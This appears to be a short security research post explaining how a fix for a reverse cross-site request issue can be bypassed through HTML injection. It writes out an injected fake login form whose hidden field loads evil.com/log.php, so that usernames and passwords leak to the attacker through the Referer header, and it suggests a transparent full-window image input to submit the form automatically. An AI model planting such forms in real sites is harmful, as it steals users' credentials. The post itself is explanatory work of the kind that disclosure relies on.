And while their fix for the RCSR issue is good, its not perfect.
Lets assume we have a html injection issue in a page called http://site.com/vuln.php in the GET parameter search; i.e. http://site.com/vuln.php?search=<img src=http://evil.com/image.jpg> would inject an image into the page.
What we can then do is inject a form into the page which looks like this:
<form action="http://site.com/vuln.php" method="get">
<input type="text" name="username" />
<input type="password" name="password" />
<input type="hidden" name="search" value="<img src='http://evil.com/log.php' />" />
<input type="submit" value="Login" />
Then if we get the user to submit the form, then the referers sent to http://evil.com/log.php will have the username and password in them.
Of course, our form would have to have an input field which is an image which is transparent but covers the whole browser window, which would submit the form for us, or similar so that the form is submitted but that issue has already been solved, and I wanted to keep the example clean.